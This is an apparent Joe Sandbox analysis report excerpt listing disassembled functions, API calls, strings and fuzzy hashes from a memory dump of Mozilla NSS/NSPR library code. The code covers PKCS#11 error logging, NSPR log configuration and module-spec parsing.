Instruction Fuzzy Hash: 8411C172A002558BD704CF25DC84B5AB7A6FF4231CF0446EAD8168FA41C775E886C7C2

Function 6C670C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0142b911938a7ab2a6ffdc07b714e897b2428499fdf50b955be0bf525b90c772
Instruction ID: a2d02ee05d3f5ef734ad1ec8524bf1b977742da5b989d91fa1a361819114c8e5
Opcode Fuzzy Hash: 0142b911938a7ab2a6ffdc07b714e897b2428499fdf50b955be0bf525b90c772
Instruction Fuzzy Hash: 9C11BF787042058FCB10DF28C8806AA7BA6EF85368F148469D8198B741DB32E906CBB4

Function 6C5E3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 45d15ffd1802122291a8ebfdafa75012ad87965c580decd97affd7ffae0f6733
Instruction ID: b041d8201d32b9e05cdf4f3bdf0763f430da1cb82c9cd80521d6e69999b6b597
Opcode Fuzzy Hash: 45d15ffd1802122291a8ebfdafa75012ad87965c580decd97affd7ffae0f6733
Instruction Fuzzy Hash: 76F0BE70E047599BCB00DF29C49019ABBF4EF4E244F008219EC8AAB300EB30AAC4C7C5

Function 6C670D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: d5419d4b8a78becf68b8df28da99a57fcef2c9436cf557bd810c092ccb73dc5c
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 13E0923A212254A7DB248E09C560AA97399DF82719FB5887DCC5D9FA01E733F80387B5

Function 6C59CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f957b762c633e6be69ae042cc55de0791cefa08ba69e805dbf3d375031b809e
Instruction ID: 9fd4fcaf4bd3eea8924d5a3ccc14fd6bf4763cc04027528c48b42e71b23eaeb4
Opcode Fuzzy Hash: 3f957b762c633e6be69ae042cc55de0791cefa08ba69e805dbf3d375031b809e
Instruction Fuzzy Hash: 71C04838244608CFC704DA08E489AA43BA8AB09610B0400A8EA028B721DB21F800DA80

Function 6C5D1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C5D1D46), ref: 6C5D2345

Strings

CKR_NEXT_OTP, xrefs: 6C5D222F
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C5D226B
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C5D1F95
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C5D204D
CKR_OPERATION_ACTIVE, xrefs: 6C5D22B8
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C5D2179
CKR_MUTEX_BAD, xrefs: 6C5D1F49
CKR_DEVICE_MEMORY, xrefs: 6C5D1FF3
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C5D1F8B
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C5D22FF
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C5D1F77
CKR_NEW_PIN_MODE, xrefs: 6C5D1E9F
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C5D1DE0
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C5D2015
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C5D227F
CKR_OK, xrefs: 6C5D1DFC
CKR_DEVICE_REMOVED, xrefs: 6C5D2261
CKR_INFORMATION_SENSITIVE, xrefs: 6C5D22B1
CKR_STATE_UNSAVEABLE, xrefs: 6C5D2037
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C5D2275
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C5D232E
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C5D2327
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C5D1F0F
CKR_SAVED_STATE_INVALID, xrefs: 6C5D1E56
CKR_PIN_EXPIRED, xrefs: 6C5D206B
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C5D1FD7
CKR_MUTEX_NOT_LOCKED, xrefs: 6C5D2225
CKR_PIN_INCORRECT, xrefs: 6C5D1D92
CKR_PIN_LOCKED, xrefs: 6C5D2075
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C5D2320
rv = 0x%x, xrefs: 6C5D2312
CKR_SIGNATURE_INVALID, xrefs: 6C5D20CF
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C5D1EE1
CKR_TOKEN_NOT_PRESENT, xrefs: 6C5D1F81
CKR_DEVICE_ERROR, xrefs: 6C5D229D
CKR_PIN_LEN_RANGE, xrefs: 6C5D2061
rv = %s, xrefs: 6C5D2340
CKR_BUFFER_TOO_SMALL, xrefs: 6C5D2183
CKR_PIN_INVALID, xrefs: 6C5D2057
CKR_RANDOM_NO_RNG, xrefs: 6C5D22A7
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C5D20D9
CKR_FUNCTION_REJECTED, xrefs: 6C5D2289
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C5D2293, 6C5D233F
CKR_WRAPPED_KEY_INVALID, xrefs: 6C5D1FB5
CKR_FUNCTION_CANCELED, xrefs: 6C5D1E73
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C5D218D
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C5D2319

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 10a0d59f6efcd4160d1d92df7090e1cc84f2b19c1d941aa0f9d0e7e9ab92766e
Instruction ID: 63ba7211f91cf8ec7efa9d4f2084f0a857d6cc002178598e9a60f2b63c2c7f7c
Opcode Fuzzy Hash: 10a0d59f6efcd4160d1d92df7090e1cc84f2b19c1d941aa0f9d0e7e9ab92766e
Instruction Fuzzy Hash: 1C61463064F345C6EA1C8C4C8DAE36D31249B4B314F638937F1828EE60D695FE92469F

Function 6C605DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C605E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C605E5C
free.MOZGLUE(00000000), ref: 6C605E7E
free.MOZGLUE(00000000), ref: 6C605E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C605EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C605EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C605EF0
free.MOZGLUE(00000000), ref: 6C605F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C605F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C605F5B
free.MOZGLUE(00000000), ref: 6C605F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C605FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C605FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C605FC4
free.MOZGLUE(00000000), ref: 6C605FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C605FE9
free.MOZGLUE(00000000), ref: 6C605FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C60600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C606027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C60605A
PR_smprintf.NSS3(6C6DAAF9,00000000), ref: 6C60606A
free.MOZGLUE(00000000), ref: 6C60607C
free.MOZGLUE(00000000), ref: 6C60609A
free.MOZGLUE(00000000), ref: 6C6060B2
free.MOZGLUE(?), ref: 6C6060CE

Strings

forceSecmodChoice, xrefs: 6C605F55
%s/%s, xrefs: 6C606055
readOnly, xrefs: 6C605E56
flags, xrefs: 6C605E3A, 6C605EC6, 6C605F30
secmod=, xrefs: 6C605FB1
secmod.db, xrefs: 6C605EA0
configDir=, xrefs: 6C605F9D
pkcs11.txt, xrefs: 6C605F47, 6C605F7C, 6C60603A, 6C606053
noModDB, xrefs: 6C605EEA

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: e58d0417c2f2e4d650fc2710d3c6fac37e5389d8d6c6036633df4daaa5321ea7
Instruction ID: ec1b34a62526a6bfce89b3aa63f231ca34dceda7bf5993e368f2a441bd69d319
Opcode Fuzzy Hash: e58d0417c2f2e4d650fc2710d3c6fac37e5389d8d6c6036633df4daaa5321ea7
Instruction Fuzzy Hash: A491FAF0B042055BEF148F259E85BAA3BA49F0634CF080060EC56BBB42E735D955CBAE

Function 6C591D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C591DA3

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C591DB2

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C591DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C591E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C591EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C591ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C591EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C591F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C591F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C591F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C591F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C591F83
PR_SetLogFile.NSS3(00000000), ref: 6C591FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C591FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C591FCB
free.MOZGLUE(00000000), ref: 6C591FD2

Strings

, %n, xrefs: 6C591E6B
NSPR_LOG_MODULES, xrefs: 6C591DAD
sync, xrefs: 6C591E46
bufsize, xrefs: 6C591E9B
append, xrefs: 6C591EE6
timestamp, xrefs: 6C591EC4
Unable to create nspr log file '%s', xrefs: 6C591FB3
all, xrefs: 6C591F0E
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C591E27
NSPR_LOG_FILE, xrefs: 6C591F69

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 871f5aa54554b66dc9768091581150dd4411de3a1aedde21e1ffbd4748674476
Instruction ID: d27c6cc985749034781fc72dd5ac22dbcf086d3311ca5511e0602e4c9fd52133
Opcode Fuzzy Hash: 871f5aa54554b66dc9768091581150dd4411de3a1aedde21e1ffbd4748674476
Instruction Fuzzy Hash: 6C51A2B1E042A99BDF00DBE5DD44B9F7BBCAF01348F040568E816EBA40E770E518CB99

Function 6C676E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C53BE66), ref: 6C676E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C53BE66), ref: 6C676E98
sqlite3_snprintf.NSS3(?,00000000,6C6DAAF9,?,?,?,?,?,?,6C53BE66), ref: 6C676EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C53BE66), ref: 6C676ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C53BE66), ref: 6C676EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C53BE66), ref: 6C676FA6
sqlite3_snprintf.NSS3(?,00000000,6C6DAAF9,00000000,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C676FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C53BE66), ref: 6C677014
sqlite3_free.NSS3(00000000,?,?,?,?,6C53BE66), ref: 6C67701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C53BE66), ref: 6C677030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C53BE66), ref: 6C67705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C53BE66), ref: 6C677079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C53BE66), ref: 6C677097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C53BE66), ref: 6C6770A0

Strings

winGetTempname2, xrefs: 6C6770C4
winGetTempname4, xrefs: 6C677046
winGetTempname1, xrefs: 6C67708F
winGetTempname5, xrefs: 6C677071
Pkl, xrefs: 6C6770A8
mz_etilqs_, xrefs: 6C676F18

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pkl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3601446709
Opcode ID: 3a089268d266ed07862952d471995daeccacb8907521b1eb29c68c31ea3af231
Instruction ID: a0f3b0525245a006b6de738ad98f1cd0e664ab05cf9f21975ed1831d13384dc4
Opcode Fuzzy Hash: 3a089268d266ed07862952d471995daeccacb8907521b1eb29c68c31ea3af231
Instruction Fuzzy Hash: 88514AB1A042116BE72196309C55BFB36569BD3318F144938E80597BC2FB29E91EC2FA

Function 6C5D8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C5D8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8EB3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C5D8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C5D8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C5D8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C5D8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C5D8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C5D8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C5D8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C5D9047

Strings

hKey = 0x%x, xrefs: 6C5D8F5B, 6C5D8F6B
pMechanism = 0x%p, xrefs: 6C5D8EE0
hSession = 0x%x, xrefs: 6C5D8E8E, 6C5D8E9E
nkl, xrefs: 6C5D8FEC, 6C5D9023
*pulWrappedKeyLen = 0x%x, xrefs: 6C5D9042
hWrappingKey = 0x%x, xrefs: 6C5D8F01, 6C5D8F11
pulWrappedKeyLen = 0x%p, xrefs: 6C5D8FC8
C_WrapKey, xrefs: 6C5D8E71
(CK_INVALID_HANDLE), xrefs: 6C5D8EAC, 6C5D8F1F, 6C5D8F79
pWrappedKey = 0x%p, xrefs: 6C5D8FAD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nkl
API String ID: 1003633598-1410028101
Opcode ID: af72ca7f8c7be015a257cc9a34f9132fd86702581f38b76daa1dd38c565f2746
Instruction ID: 90890a0483fd0a745b031e72c9ca1c423ed2a5f54dda8ebd5f4d56aee9442871
Opcode Fuzzy Hash: af72ca7f8c7be015a257cc9a34f9132fd86702581f38b76daa1dd38c565f2746
Instruction Fuzzy Hash: C65196B2701206EBDB009F54DD48F9A7B76EB8631CF055429F5086BA12DF30A918CB9F

Function 6C604FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000,00000000,00000001), ref: 6C605009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2,00000000), ref: 6C605049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C60505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C605071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6050A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6050B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5B75C2), ref: 6C6050CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6050D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6050F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60511D
